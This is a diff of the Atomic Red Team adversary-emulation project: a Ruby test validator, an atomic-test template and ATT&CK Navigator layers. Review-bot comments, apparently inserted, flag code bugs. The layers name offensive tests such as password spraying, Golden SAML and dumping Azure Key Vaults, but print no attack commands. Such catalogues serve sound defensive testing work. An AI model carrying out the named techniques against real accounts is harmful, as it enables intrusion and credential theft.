"#{link_display} [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)"
# we don't have a file for this technique, so link to an edit page
"#{link_display} [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)"
end
end
def atomic_yaml_has_test_for_platform(yaml_file, only_platform)
has_test_for_platform = false
if File.exists? yaml_file
yaml = YAML.load_file(yaml_file)
yaml['atomic_tests'].each_with_index do |atomic, i|
if atomic["supported_platforms"].any? {|platform| platform.downcase =~ only_platform}
has_test_for_platform = true
break
end
end
end
return has_test_for_platform
end
def validate_atomic_yaml!(yaml, used_guids_file, unique_guid_array)
def validate_atomic_yaml!(yaml)
raise("YAML file has no elements") if yaml.nil?
raise('`attack_technique` element is required') unless yaml.has_key?('attack_technique')
raise('`attack_technique` element must be a string') unless yaml['attack_technique'].is_a?(String)
raise('`attack_technique` element must be an array') unless yaml['attack_technique'].is_a?(String)
raise('`display_name` element is required') unless yaml.has_key?('display_name')
raise('`display_name` element must be an array') unless yaml['display_name'].is_a?(String)
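Review bot: the `display_name` check raises '`display_name` element must be an array' while the condition tested is `yaml['display_name'].is_a?(String)`, so a failing file is told to do the wrong thing; the message should say 'must be a string' (one of the two `attack_technique` lines next to it has the same string/array mismatch). Separately, `File.exists?` is the deprecated spelling and was removed in Ruby 3.2; use `File.exist?` in both `github_link_to_technique` and `atomic_yaml_has_test_for_platform`, and 'link to it's Markdown file' should read 'its'.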
@@ -117,34 +77,20 @@ class AtomicRedTeam
yaml['atomic_tests'].each_with_index do |atomic, i|
raise("`atomic_tests[#{i}].name` element is required") unless atomic.has_key?('name')
raise("`atomic_tests[#{i}].name` element must be a string") unless atomic['name'].is_a?(String)
if atomic.has_key?('auto_generated_guid')
guid = atomic["auto_generated_guid"].to_s
raise("`atomic_tests[#{i}].auto_generated_guid` element not a proper guid") unless /[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}/.match(guid)
raise("`atomic_tests[#{i}].auto_generated_guid` element must be unique") unless !unique_guid_array.include?(guid)
unique_guid_array << guid
end
raise("`atomic_tests[#{i}].description` element is required") unless atomic.has_key?('description')
raise("`atomic_tests[#{i}].description` element must be a string") unless atomic['description'].is_a?(String)
raise("`atomic_tests[#{i}].supported_platforms` element is required") unless atomic.has_key?('supported_platforms')
raise("`atomic_tests[#{i}].supported_platforms` element must be an Array (was a #{atomic['supported_platforms'].class.name})") unless atomic['supported_platforms'].is_a?(Array)
valid_supported_platforms = ['windows', 'macos', 'linux', 'office-365', 'azure-ad', 'google-workspace', 'saas', 'iaas', 'containers', 'iaas:aws', 'iaas:azure', 'iaas:gcp']
valid_supported_platforms = ['windows', 'centos', 'ubuntu', 'macos', 'linux']
atomic['supported_platforms'].each do |platform|
if !valid_supported_platforms.include?(platform)
raise("`atomic_tests[#{i}].supported_platforms` '#{platform}' must be one of #{valid_supported_platforms.join(', ')}")
end
end
if atomic['dependencies']
atomic['dependencies'].each do |dependency|
raise("`atomic_tests[#{i}].dependencies` '#{dependency}' must be have a description}") unless dependency.has_key?('description')
raise("`atomic_tests[#{i}].dependencies` '#{dependency}' must be have a prereq_command}") unless dependency.has_key?('prereq_command')
raise("`atomic_tests[#{i}].dependencies` '#{dependency}' must be have a get_prereq_command}") unless dependency.has_key?('get_prereq_command')
end
end
(atomic['input_arguments'] || {}).each_with_index do |arg_kvp, iai|
arg_name, arg = arg_kvp
raise("`atomic_tests[#{i}].input_arguments[#{iai}].description` element is required") unless arg.has_key?('description')
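Review bot: the GUID format check `/[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}/.match(guid)` is unanchored, so a value with extra characters before or after a valid GUID passes validation; anchor it with `\A…\z` and share the one pattern with `add_guid_to_used_guid_file`, which repeats it. The three dependency messages read 'must be have a description}' (and likewise for `prereq_command` and `get_prereq_command`): drop the 'be' and the stray closing brace.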
@@ -165,7 +111,7 @@ class AtomicRedTeam
raise("`atomic_tests[#{i}].executor.name` element must be a string") unless executor['name'].is_a?(String)
raise("`atomic_tests[#{i}].executor.name` element must be lowercased and underscored (was #{executor['name']})") unless executor['name'] =~ /[a-z_]+/
valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud', 'kubectl']
valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual']
case executor['name']
when 'manual'
raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps')
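Review bot: `executor['name'] =~ /[a-z_]+/` is unanchored, so it accepts any name that contains at least one lowercase letter or underscore (`Power Shell` would pass) and does not enforce the 'lowercased and underscored' rule the message promises; use `/\A[a-z_]+\z/`. Since `valid_executor_types` is checked right after, the regex is arguably redundant and could be dropped instead.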
@@ -175,7 +121,7 @@ class AtomicRedTeam
string: executor['steps'],
string_description: "atomic_tests[#{i}].executor.steps"
when 'command_prompt', 'sh', 'bash', 'powershell', 'aws', 'az', 'gcloud', 'kubectl'
when 'command_prompt', 'sh', 'bash', 'powershell'
raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command')
raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String)
@@ -190,50 +136,6 @@ class AtomicRedTeam
end
end
def record_used_guids!(yaml, used_guids_file)
return unless !yaml.nil?
yaml['atomic_tests'].each_with_index do |atomic, i|
next unless atomic.has_key?('auto_generated_guid')
guid = atomic["auto_generated_guid"].to_s
add_guid_to_used_guid_file(guid, used_guids_file) unless guid == ''
end
end
def generate_guids_for_yaml!(path, used_guids_file)
text = File.read(path)
# add the "auto_generated_guid:" element after the "- name:" element if it isn't already there
text.gsub!(/(?i)(^([ \t]*-[ \t]*)name:.*$(?!\s*auto_generated_guid))/) { |m| "#{$1}\n#{$2.gsub(/-/," ")}auto_generated_guid:"}
# fill the "auto_generated_guid:" element in if it doesn't contain a guid
text.gsub!(/(?i)^([ \t]*auto_generated_guid:)(?!([ \t]*[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12})).*$/) { |m| "#{$1} #{get_unique_guid!(used_guids_file)}"}
File.open(path, "w") { |file| file << text }
end
# generates a unique guid and records the guid as having been used by writing it to the used_guids_file
def get_unique_guid!(used_guids_file)
new_guid = ''
20.times do |i| # if it takes more than 20 tries to get a unique guid, there must be something else going on
new_guid = SecureRandom.uuid
break unless !is_unique_guid(new_guid, used_guids_file)
end
# add this new unique guid to the used guids file
add_guid_to_used_guid_file(new_guid, used_guids_file)
return new_guid
end
# add guid to used guid file if it is the proper format and is not already in the file. raises an exception if guid isn't valid
def add_guid_to_used_guid_file(guid, used_guids_file)
open(used_guids_file, 'a') { |f|
raise("the GUID (#{guid}) does not match the required format for the `auto_generated_guid` element") unless /[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}/ =~ guid
f.puts guid unless !is_unique_guid(guid, used_guids_file)
}
end
def is_unique_guid(guid, used_guids_file)
return !File.foreach(used_guids_file).grep(/#{guid}/).any?
end
#
# Validates that the arguments (specified in "#{arg}" format) in a string
# match the input_arguments for a test
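Review bot: `get_unique_guid!` tries 20 times but never raises when every attempt collides; after the loop it falls through, `add_guid_to_used_guid_file` silently declines to record the non-unique value, and the caller still receives it, so raise after the loop if the last candidate is not unique (the comment already says that case means something else is wrong). `is_unique_guid` also interpolates the GUID into a regex (`grep(/#{guid}/)`) and matches substrings; `File.foreach(used_guids_file).any? { |line| line.strip == guid }` is exact and safe for arbitrary input. The `break unless !…` and `return unless !…` double negatives read more clearly as `break if` and `return if`.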
+4 -14
View File
@@ -10,27 +10,17 @@ atomic_tests:
supported_platforms:
- windows
- macos
- centos
- ubuntu
- linux
input_arguments:
output_file:
description: TODO
type: TODO
type: todo
default: TODO
dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands.
dependencies: # (optional)
- description: |
TODO
prereq_command: | # Commands to check if prerequisites for running this test are met. For the "command_prompt" executor, if any command returns a non-zero exit code, the prerequisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success.
TODO
get_prereq_command: | # Commands to meet this prerequisite or a message describing how to meet this prerequisite.
TODO
executor:
name: command_prompt
elevation_required: true # Indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false.
command: | # These are the actaul attack commands, at least one command must be provided.
TODO
cleanup_command: | # You can remove the cleanup_command section if there are no cleanup commands.
command: |
TODO
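Review bot: typo in the comment on the `command:` line, 'actaul' for 'actual'. The placeholder for `type` flips between `TODO` and `todo` across the two versions; keep the casing consistent with the other placeholders in the template so a grep for `TODO` catches all of them.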
+4 -8
View File
@@ -22,7 +22,6 @@ class Attack
'collection',
'exfiltration',
'command-and-control',
'impact'
]
end
@@ -74,10 +73,9 @@ class Attack
def techniques_by_tactic(only_platform: /.*/)
techniques_by_tactic = Hash.new {|h, k| h[k] = []}
techniques.each do |technique|
next unless !technique['x_mitre_platforms'].nil?
next unless technique['x_mitre_platforms'].any? { |platform| platform.downcase.sub(" ", "-") =~ only_platform }
next unless technique['x_mitre_platforms'].any? {|platform| platform.downcase =~ only_platform}
technique.fetch('kill_chain_phases', []).select { |phase| phase['kill_chain_name'] == 'mitre-attack' }.each do |tactic|
technique.fetch('kill_chain_phases', []).select {|phase| phase['kill_chain_name'] == 'mitre-attack'}.each do |tactic|
techniques_by_tactic[tactic.fetch('phase_name')] << technique
end
end
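Review bot: `next unless !technique['x_mitre_platforms'].nil?` is a double negative; `next if technique['x_mitre_platforms'].nil?` says the same thing. `platform.downcase.sub(" ", "-")` replaces only the first space, so a platform name with more than one space would not normalise to the hyphenated form the `only_platform` regexes expect; `tr(' ', '-')` handles all of them.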
@@ -88,10 +86,8 @@ class Attack
# Returns a list of all ATT&CK techniques
#
def techniques
return @techniques unless @techniques.nil?
# pull out the attack pattern objects
@techniques = attack_stix.fetch("objects").select do |item|
attack_stix.fetch("objects").select do |item|
item.fetch('type') == 'attack-pattern' && item.fetch('external_references', []).select do |references|
references['source_name'] == 'mitre-attack'
end
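Review bot: in the `select` block, `item.fetch('type') == 'attack-pattern' && item.fetch('external_references', []).select do … end` is truthy for every attack-pattern, because the inner `select` returns an Array and an empty Array is truthy in Ruby; the `references['source_name'] == 'mitre-attack'` filter therefore never excludes anything. Use `.any? { |references| references['source_name'] == 'mitre-attack' }` instead. Memoising into `@techniques` is a good change; callers just need to treat the returned array as read-only.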
@@ -114,4 +110,4 @@ class Attack
end
end
end
end
end
File diff suppressed because one or more lines are too long
+48 -60
View File
@@ -13,16 +13,13 @@
# atomic_red_team/atomics
# atomic_red_team/atomics/T1234
# atomic_red_team/atomics/T1234/T1234.yaml <-- this is where all the atomic tests live
# atomic_red_team/atomics/T1234/src/payload1.sct <-- a payload file needed by one of the T1234 atomics (human readable)
# atomic_red_team/atomics/T1234/bin/payload2.dll <-- another payload file needed by one of the T1234 atomics (binary)
# atomic_red_team/atomics/T1234/payload1.sct <-- a payload file needed by one of the T1234 atomics
# atomic_red_team/atomics/T1234/payload2.dll <-- another payload file needed by one of the T1234 atomics
#
# In general, a set of atomic tests for a technique should never depend on payloads
# or supporting files from other atomic directories. We want to keep things nice and close.
# Use git symlinks if you really need to share files between techniques.
#
# Atomic tests should be fully automated whenever possible, requiring no continued interaction.
# Include any needed options to execute the commands seamlessly, for example SysInternal's -accepteula option or any -q or -quiet modes.
#
# To validate your atomics, run `bin/validate_atomics.rb`
---
attack_technique: TXXXX # (with a capital T, Example: 'T1123')
@@ -38,7 +35,6 @@ atomic_tests:
# This is the first atomic test
#
- name: Short name of the test that titles how it tests the technique. # Example: "SourceRecorder via cmd.exe"
auto_generated_guid: # This key and/or it's value will be added by the CI build after submitting a Pull Request
description: |
Long form description of the test. Markdown is supported so you can **bold** items, create
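Review bot: in the `auto_generated_guid:` comment, 'it's value' should be 'its value'.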
@@ -50,16 +46,9 @@ atomic_tests:
# supported platforms is an array of the OS/platforms this atomic test can be run upon. Values include:
# - windows
# - macos
# - centos
# - ubuntu
# - linux
# - office-365
# - azure-ad
# - google-workspace
# - saas
# - iaas
# - containers
# - iaas:gcp
# - iaas:azure
# - iaas:aws
supported_platforms:
- windows
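Review bot: this platform list duplicates `valid_supported_platforms` in the validator (`atomic_red_team.rb`), and the two must already move in lockstep (both gain `office-365`, `azure-ad`, `google-workspace`, `saas`, `iaas`, `containers`, `iaas:gcp`, `iaas:azure` and `iaas:aws` and lose `centos`/`ubuntu` in this diff); a cross-reference comment in each place, or generating this comment from the validator's array, would keep them from drifting.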
@@ -87,60 +76,63 @@ atomic_tests:
type: Url
default: 0000:00:30
dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands
dependencies: # (optional)
# a list of dependies that must be met to successfully run this atomic
- description: |
TODO
prereq_command: | # commands to check if prerequisites for running this test are met. For the "command_prompt" executor, if any command returns a non-zero exit code, the pre-requisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success.
TODO
get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq
TODO
#example of two dependencies
dependencies:
- description: |
Sysmon executable must be available
prereq_command: |
where sysmon > nul
get_prereq_command: |
echo Automated installer not implemented yet, please install Sysmon manually
- description: |
Sysmon must be installed
prereq_command: |
sc query sysmon > nul
get_prereq_command: |
sysmon -i -accepteula
# a list of executors that can execute the attack commands of this atomic test. There are almost always going to be one of these
# a list of executors that can execute this atomic test. There are almost always going to be one of these
# per test, but there are cases where you may have multiple - for example, separate executors for `sh`
# and `bash` when working on linux OSes.
# Names of cloud/container specific runtimes can also be used, such as `aws`, `az`, `gcloud` and `kubectl`.
executor:
executors:
# the name of the executor describes the framework or application in which the test should be executed.
#
# Each of these executors will have options that the executor needs to run. Possible executors we've imagined
# at this time and their required options include:
#
# - command_prompt, sh, bash, powershell, manual, aws, az, gcloud, kubectl
#
# Each of the above requires the "command" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe, powershell.exe, sh or bash respectively
# - `command_prompt` : The Windows Command Prompt, aka cmd.exe
# Requires the "command" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# name: command_prompt
# - name: command_prompt
# command: |
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `manual` : a list of manual steps to run. This should only be used when required, for example when GUI steps are involved that
# - `powershell` : Powershell
# Requires the "`command`" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: powershell
# command: |
# Write-Debug "attack starting"
# Write-Debug "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `sh` : Linux's bourne shell
# Requires the "`command`" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: sh
# command: |
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `bash` : Linux's bourne again shell
# Requires the "`command`" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: bash
# command: |
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `manual` : a list of manual steps to run. This is most often used when GUI steps are involved that
# cannot be automated.
#
# Requires the `steps` option that tells the user what to do to invoke the test. This is a
# multi-line list of instructions (also preprocessed)
#
# Example:
# name: manual
# - name: manual
# steps: |
# 1. Navigate to [chrome://extensions](chrome://extensions) and
# tick 'Developer Mode'.
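Review bot: the `powershell`, `sh` and `bash` executor descriptions all end with 'then executed by cmd.exe', a copy-paste from the `command_prompt` entry; they should say powershell.exe, sh and bash respectively (the consolidated version, 'executed by cmd.exe, powershell.exe, sh or bash respectively', gets this right). Also 'a list of dependies' should be 'dependencies'.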
@@ -150,27 +142,23 @@ atomic_tests:
#
# 3. Click the '#{FOOBAR}' button - you can interpolate here too!
#
name: command_prompt
elevation_required: true
# indicates whether command must be run with admin privileges.
#If the elevation_required attribute is not defined, the value is assumed to be false
- name: command_prompt
command: |
SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
cleanup_command: | # you can remove the cleanup_command section if there are no cleanup commands
#
# This is the second atomic test
#
- name: Echo to the screen
description: |
blah blah blah
supported_platforms:
- macos
- linux
- centos
- ubuntu
# in this example we have no input arguments
input_arguments:
executor:
name: bash
executors:
- name: bash
command: echo "Hello world!"
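Review bot: the first example leaves `cleanup_command: |` with no body, so the key serialises to an empty string, which contradicts its own comment that the section should be removed when there are no cleanup commands; either give it a sample command or drop the key. Minor: `#If the elevation_required attribute…` is missing the space after `#`, and the second test's description 'blah blah blah' would be more useful as a one-line sentence.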
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1531","score":2,"enabled":true,"comment":"\n- Azure AD - Delete user via Azure AD PowerShell\n- Azure AD - Delete user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Containers)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into 
Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"comment":"\n- Container and ResourceDiscovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Google-Workspace)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1562","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":3,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":2,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n","links":[{"label":"View 
